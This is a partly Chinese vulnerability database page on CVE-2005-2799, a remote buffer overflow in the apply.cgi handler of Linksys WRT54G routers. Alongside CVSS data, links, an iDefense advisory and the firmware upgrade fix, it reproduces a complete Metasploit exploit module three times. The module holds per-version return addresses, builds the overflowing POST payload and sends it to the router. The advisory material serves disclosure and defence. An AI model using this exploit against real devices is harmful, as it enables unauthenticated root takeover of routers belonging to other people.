CVE-2005-2799
CVSS7.5
发布时间 :2005-09-15 16:03:00
修订时间 :2008-09-05 16:52:43
NMCOEP    

[原文]Buffer overflow in apply.cgi in Linksys WRT54G 3.01.03, 3.03.6, and possibly other versions before 4.20.7, allows remote attackers to execute arbitrary code via a long HTTP POST request.


[CNNVD]Linksys WRT54G apply.cgi缓冲区溢出漏洞(CNNVD-200509-138)

        Linksys WRT54G是结合了无线接入点、交换机和路由器功能的无线路由设备。
        Linksys WRT54G 3.01.03, 3.03.6, 可能还包括4.20.7以前的版本,在apply.cgi中存在缓冲区溢出漏洞,这可能允许远程攻击者通过一个长的HTTP POST请求执行任意的代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/h:linksys:wrt54g:3.03.6Linksys WRT54G 3.03.6
cpe:/h:linksys:wrt54g:3.01.3Linksys WRT54G 3.01.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2799
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2799
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200509-138
(官方数据源) CNNVD

- 其它链接及资源

http://www.idefense.com/application/poi/display?id=305&type=vulnerabilities
(VENDOR_ADVISORY)  IDEFENSE  20050913 Linksys WRT54G Router Remote Administration apply.cgi Buffer Overflow Vulnerability

- 漏洞信息

Linksys WRT54G apply.cgi缓冲区溢出漏洞
高危 缓冲区溢出
2005-09-15 00:00:00 2005-10-20 00:00:00
远程  
        Linksys WRT54G是结合了无线接入点、交换机和路由器功能的无线路由设备。
        Linksys WRT54G 3.01.03, 3.03.6, 可能还包括4.20.7以前的版本,在apply.cgi中存在缓冲区溢出漏洞,这可能允许远程攻击者通过一个长的HTTP POST请求执行任意的代码。

- 公告与补丁

        暂无数据

- 漏洞信息 (10028)

Linksys WRT54G < 4.20.7 , WRT54GS < 1.05.2 apply.cgi Buffer Overflow (EDBID:10028)
cgi remote
2005-09-13 Verified
80 Raphael Rigo
N/A [点击下载]
require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Linksys apply.cgi buffer overflow',
			'Description'    => %q{
				This module exploits a stack overflow in apply.cgi on the Linksys WRT54G and WRT54GS routers.
				According to iDefense who discovered this vulnerability, all WRT54G versions prior to
				4.20.7 and all WRT54GS version prior to 1.05.2 may be be affected.
			},
			'Author'         => [ 'Raphael Rigo <devel-metasploit[at]syscall.eu>', 'Julien Tinnes <julien[at]cr0.org>' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-2799'],
					[ 'OSVDB', '19389' ],
					[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=305'],
				],
			'Payload'        =>
				{
					#'BadChars' => "\x00",
					'Space'    => 10000,
					'DisableNops' => true,
				},
			'Arch'		 => ARCH_MIPSLE,
			'Platform'       => 'linux',
			'Targets'        => 
				[
					# the middle of the intersection is our generic address
					#((addrs.map { |n, h| [h["Bufaddr"],n] }.max[0] + addrs.map { |n, h| [h["Bufaddr"],n] }.min[0]+9500)/2).to_s(16)
					[ 'Generic', { 'Bufaddr' => 0x10002b50}],
					[ 'Version 1.42.2', { 'Bufaddr' => 0x100016a8 }],
					[ 'Version 2.02.6beta1', { 'Bufaddr' => 0x10001760 }],
					[ 'Version 2.02.7_ETSI', { 'Bufaddr' => 0x10001634 }],
					[ 'Version 3.03.6', { 'Bufaddr' => 0x10001830 }],
					[ 'Version 4.00.7', { 'Bufaddr' => 0x10001AD8 }],
					[ 'Version 4.20.06', { 'Bufaddr' => 0x10001B50 }],
				],
			'DisclosureDate' => 'Sep 13 2005',
			'DefaultTarget' => 0))
			
			register_options(
				[
					Opt::RPORT(80),
					Opt::RHOST('192.168.1.1')
				], self.class)
	end


# Approx size of the remaining space in the data segment after our buffer
DataSegSize=0x4000
	def exploit
		c = connect

		print_status("Return address at 0x#{target['Bufaddr'].to_s(16)}")
		print_status("Shellcode length: #{payload.encoded.length}")

		addr = [target['Bufaddr']].pack('V')

#		original = "Cache-Control: no-cache\r\nPragma: no-cache\r\nExpires: 0\x00\x00\x00"
#		original += "\x10\xAD\x43\x00\x18\xAD\x43\x00\x70\x3e\x00\x10\x00\x00\x00\x00"
#		            Pointers in 2.02.6beta1


#		 | BIG BUFFER  | Various structs and function pointers | ... | .ctors | .dtors | ... | .got |
#		 | <- 10000 -> | **************************** Pad with return address ***********************
#		 I know this is horrible :( - On the other side this is very generic :)
		post_data = "\x00"*(10000-payload.encoded.length)+payload.encoded+addr*(DataSegSize/4)
		
		#post_data = "\x00"*(10000-payload.encoded.length)+payload.encoded+original+addr*2#+"\x24\xad\x43"

#	        res = send_request_cgi({ 'uri' => "/apply.cgi",	
#				  'method' => 'POST',
#				  'data' => post_data });
#		print_status("Malicious request sent, do_ej should be overwritten")
		
		req = c.request_cgi({ 'uri' => "/apply.cgi",	
				  'method' => 'POST',
				  'data' => post_data })
		c.send_request(req)
		print_status("Mayhem sent")


#		req=c.request_cgi('uri' => '/');
#		c.send_request(req);
#		print_status("do_ej triggered")

		handler
		disconnect
	end

end
		

- 漏洞信息 (16854)

Linksys WRT54 Access Point apply.cgi Buffer Overflow (EDBID:16854)
hardware remote
2010-09-24 Verified
0 metasploit
N/A [点击下载]
##
# $Id: linksys_apply_cgi.rb 10457 2010-09-24 16:55:38Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Linksys WRT54 Access Point apply.cgi Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in apply.cgi on the Linksys WRT54G and WRT54GS routers.
				According to iDefense who discovered this vulnerability, all WRT54G versions prior to
				4.20.7 and all WRT54GS version prior to 1.05.2 may be be affected.
			},
			'Author'         => [ 'Raphael Rigo <devel-metasploit[at]syscall.eu>', 'Julien Tinnes <julien[at]cr0.org>' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10457 $',
			'References'     =>
				[
					[ 'CVE', '2005-2799'],
					[ 'OSVDB', '19389' ],
					[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=305'],
				],
			'Payload'        =>
				{
					#'BadChars' => "\x00",
					'Space'    => 10000,
					'DisableNops' => true,
				},
			'Arch'		 => ARCH_MIPSLE,
			'Platform'       => 'linux',
			'Targets'        =>
				[
					# the middle of the intersection is our generic address
					#((addrs.map { |n, h| [h["Bufaddr"],n] }.max[0] + addrs.map { |n, h| [h["Bufaddr"],n] }.min[0]+9500)/2).to_s(16)
					[ 'Generic', { 'Bufaddr' => 0x10002b50}],
					[ 'Version 1.42.2', { 'Bufaddr' => 0x100016a8 }],
					[ 'Version 2.02.6beta1', { 'Bufaddr' => 0x10001760 }],
					[ 'Version 2.02.7_ETSI', { 'Bufaddr' => 0x10001634 }],
					[ 'Version 3.03.6', { 'Bufaddr' => 0x10001830 }],
					[ 'Version 4.00.7', { 'Bufaddr' => 0x10001AD8 }],
					[ 'Version 4.20.06', { 'Bufaddr' => 0x10001B50 }],
				],
			'DisclosureDate' => 'Sep 13 2005',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(80),
				Opt::RHOST('192.168.1.1')
			], self.class)
	end

	# Approx size of the remaining space in the data segment after our buffer
	DataSegSize = 0x4000

	def exploit
		c = connect

		print_status("Return address at 0x#{target['Bufaddr'].to_s(16)}")
		print_status("Shellcode length: #{payload.encoded.length}")

		addr = [target['Bufaddr']].pack('V')

#		original = "Cache-Control: no-cache\r\nPragma: no-cache\r\nExpires: 0\x00\x00\x00"
#		original += "\x10\xAD\x43\x00\x18\xAD\x43\x00\x70\x3e\x00\x10\x00\x00\x00\x00"
#		            Pointers in 2.02.6beta1


#		 | BIG BUFFER  | Various structs and function pointers | ... | .ctors | .dtors | ... | .got |
#		 | <- 10000 -> | **************************** Pad with return address ***********************
#		 I know this is horrible :( - On the other side this is very generic :)
		post_data = "\x00"*(10000-payload.encoded.length)+payload.encoded+addr*(DataSegSize/4)

		#post_data = "\x00"*(10000-payload.encoded.length)+payload.encoded+original+addr*2#+"\x24\xad\x43"

#	        res = send_request_cgi({ 'uri' => "/apply.cgi",
#				  'method' => 'POST',
#				  'data' => post_data });
#		print_status("Malicious request sent, do_ej should be overwritten")

		req = c.request_cgi({ 'uri' => "/apply.cgi",
			'method' => 'POST',
			'data' => post_data
		})
		c.send_request(req)
		print_status("Mayhem sent")


#		req=c.request_cgi('uri' => '/');
#		c.send_request(req);
#		print_status("do_ej triggered")

		handler
		disconnect
	end

end
		

- 漏洞信息 (F82237)

Linksys apply.cgi Buffer Overflow (PacketStormID:F82237)
2009-10-27 00:00:00
Raphael Rigo,Julien Tinnes  
exploit,overflow,cgi
CVE-2005-2799
[点击下载]

This Metasploit module exploits a stack overflow in apply.cgi on the Linksys WRT54G and WRT54GS routers. According to iDefense who discovered this vulnerability, all WRT54G versions prior to 4.20.7 and all WRT54GS version prior to 1.05.2 may be be affected.

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Linksys apply.cgi buffer overflow',
			'Description'    => %q{
				This module exploits a stack overflow in apply.cgi on the Linksys WRT54G and WRT54GS routers.
				According to iDefense who discovered this vulnerability, all WRT54G versions prior to
				4.20.7 and all WRT54GS version prior to 1.05.2 may be be affected.
			},
			'Author'         => [ 'Raphael Rigo <devel-metasploit[at]syscall.eu>', 'Julien Tinnes <julien[at]cr0.org>' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-2799'],
					[ 'OSVDB', '19389' ],
					[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=305'],
				],
			'Payload'        =>
				{
					#'BadChars' => "\x00",
					'Space'    => 10000,
					'DisableNops' => true,
				},
			'Arch'		 => ARCH_MIPSLE,
			'Platform'       => 'linux',
			'Targets'        => 
				[
					# the middle of the intersection is our generic address
					#((addrs.map { |n, h| [h["Bufaddr"],n] }.max[0] + addrs.map { |n, h| [h["Bufaddr"],n] }.min[0]+9500)/2).to_s(16)
					[ 'Generic', { 'Bufaddr' => 0x10002b50}],
					[ 'Version 1.42.2', { 'Bufaddr' => 0x100016a8 }],
					[ 'Version 2.02.6beta1', { 'Bufaddr' => 0x10001760 }],
					[ 'Version 2.02.7_ETSI', { 'Bufaddr' => 0x10001634 }],
					[ 'Version 3.03.6', { 'Bufaddr' => 0x10001830 }],
					[ 'Version 4.00.7', { 'Bufaddr' => 0x10001AD8 }],
					[ 'Version 4.20.06', { 'Bufaddr' => 0x10001B50 }],
				],
			'DisclosureDate' => 'Sep 13 2005',
			'DefaultTarget' => 0))
			
			register_options(
				[
					Opt::RPORT(80),
					Opt::RHOST('192.168.1.1')
				], self.class)
	end


# Approx size of the remaining space in the data segment after our buffer
DataSegSize=0x4000
	def exploit
		c = connect

		print_status("Return address at 0x#{target['Bufaddr'].to_s(16)}")
		print_status("Shellcode length: #{payload.encoded.length}")

		addr = [target['Bufaddr']].pack('V')

#		original = "Cache-Control: no-cache\r\nPragma: no-cache\r\nExpires: 0\x00\x00\x00"
#		original += "\x10\xAD\x43\x00\x18\xAD\x43\x00\x70\x3e\x00\x10\x00\x00\x00\x00"
#		            Pointers in 2.02.6beta1


#		 | BIG BUFFER  | Various structs and function pointers | ... | .ctors | .dtors | ... | .got |
#		 | <- 10000 -> | **************************** Pad with return address ***********************
#		 I know this is horrible :( - On the other side this is very generic :)
		post_data = "\x00"*(10000-payload.encoded.length)+payload.encoded+addr*(DataSegSize/4)
		
		#post_data = "\x00"*(10000-payload.encoded.length)+payload.encoded+original+addr*2#+"\x24\xad\x43"

#	        res = send_request_cgi({ 'uri' => "/apply.cgi",	
#				  'method' => 'POST',
#				  'data' => post_data });
#		print_status("Malicious request sent, do_ej should be overwritten")
		
		req = c.request_cgi({ 'uri' => "/apply.cgi",	
				  'method' => 'POST',
				  'data' => post_data })
		c.send_request(req)
		print_status("Mayhem sent")


#		req=c.request_cgi('uri' => '/');
#		c.send_request(req);
#		print_status("do_ej triggered")

		handler
		disconnect
	end

end

    

- 漏洞信息 (F40042)

iDEFENSE Security Advisory 2005-09-13.5 (PacketStormID:F40042)
2005-09-14 00:00:00
iDefense Labs,Greg MacManus  idefense.com
advisory,remote,overflow,arbitrary,cgi,root
cisco
CVE-2005-2799
[点击下载]

iDEFENSE Security Advisory 09.13.05 - Remote exploitation of a buffer overflow vulnerability in multiple versions of the firmware for Cisco Systems Inc.'s Linksys WRT54G wireless router may allow unauthenticated execution of arbitrary commands as the root user. The vulnerability specifically exists in the 'apply.cgi' handler of the httpd running on the internal interfaces, including the by default the wireless interface. This handler is used by the many of the configuration pages to perform the configuration management of the router. If an unauthenticated remote attacker sends a POST request to the apply.cgi page on the router with a content length longer than 10000 bytes, an exploitable buffer overflow may occur. iDEFENSE has confirmed the existence of this vulnerability in version 3.01.03 of the firmware of the Linksys WRT54G, and has identified the same code is present in version 3.03.6. All versions prior to 4.20.7 may be affected.

Linksys WRT54G Router Remote Administration apply.cgi Buffer Overflow
Vulnerability

iDEFENSE Security Advisory 09.13.05
www.idefense.com/application/poi/display?id=305&type=vulnerabilities
September 13, 2005

I. BACKGROUND

The Linksys WRT54G is a combination wireless access point, switch and
router. More information is available at the following URL:

 http://www.linksys.com/products/product.asp?prid=508

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in multiple 
versions of the firmware for Cisco Systems Inc.'s Linksys WRT54G
wireless router may allow unauthenticated execution of arbitrary
commands as the root user.

The vulnerability specifically exists in the 'apply.cgi' handler of the 
httpd running on the internal interfaces, including the by default the 
wireless interface. This handler is used by the many of the
configuration pages to perform the configuration management of the
router.

If an unauthenticated remote attacker sends a POST request to the 
apply.cgi page on the router with a content length longer than 10000 
bytes, an exploitable buffer overflow may occur.

III. ANALYSIS

Successful exploitation of this vulnerability would allow an 
unauthenticated user to execute arbitrary commands on the affected
router with root privileges. This could allow any operation to be
performed on the router, including changing passwords and firewall
configuration, installation of new firmware with other features, or
denial of service. Exploitation of this vulnerability requires that an
attacker can connect to the web management port of the router. The
httpd is running by default but is only accessible via the LAN ports or
the WLAN (wireless LAN). An attacker who can associate via the wireless
interface to the network running a vulnerable httpd could send an
exploit from a wireless device, and so not require direct physical
access to an affected network. Additionally, if the httpd is configured
to listen on the WAN (internet) interface, this vulnerability would be
exploitable remotely over the internet.

On some versions of the WRT54G firmware the buffer used to store the
POST input, 'post_buf', is before a structure in memory containing
pointers to the 'mime_handlers' structure, which contains function
pointers for handling the various types of input. By overwriting this
structure so some function pointers point into post_buf, it is possible
to execute arbitrary commands. Overwriting these values with nulls will
prevent access to the httpd on the system until the router is
restarted. Overwriting these values with 'garbage' values will cause
the httpd to crash but it will be restarted by a system monitoring
process within 2 minutes, allowing multiple exploitation attempts.

Although authentication checks are performed on access to this page, the

code which reads in the buffer is executed even if authentication fails,

so as to clear the input buffer from the client before returning an
error message. This may allow an unauthenticated user to exploit the 
vulnerability.

IV. DETECTION

iDEFENSE has confirmed the existence of this vulnerability in version 
3.01.03 of the firmware of the Linksys WRT54G, and has identified the 
same code is present in version 3.03.6. All versions prior to 4.20.7 may

be affected.

As this firmware is Open Source, and based on a reference implementation

supplied by the original hardware maker, there may be other affected 3rd

party firmware which use the same or similar code, and are thus also 
affected.

V. WORKAROUND

In order to mitigate exposure of the internal network to outside 
attackers, ensure encryption is enabled on the wireless interface. The 
exact settings to use are dependent on your wireless deployment
policies.

VI. VENDOR RESPONSE

This vulnerability is addressed in firmware version 4.20.7 available for
download at:

http://www.linksys.com/servlet/Satellite?childpagename=US%2FLayout
 
&packedargs=c%3DL_Download_C2%26cid%3D1115417109974%26sku%3D112491680264
5
 &pagename=Linksys%2FCommon%2FVisitorWrapper

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-2799 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

06/07/2005 Initial vendor notification
06/07/2005 Initial vendor response
09/13/2005 Coordinated public disclosure

IX. CREDIT

This vulnerability was discovered by Greg MacManus of iDEFENSE Labs.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright (c) 2005 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
    

- 漏洞信息

19389
Cisco Linksys WRT54G apply.cgi POST Request Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Commercial

- 漏洞描述

A remote overflow exists in Linksys Wireless-G Router WRT54G. The 'apply.cgi' script fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted HTTP POST request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2005-09-13 Unknow
Unknow Unknow

- 解决方案

Upgrade to firmware 4.20.7 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站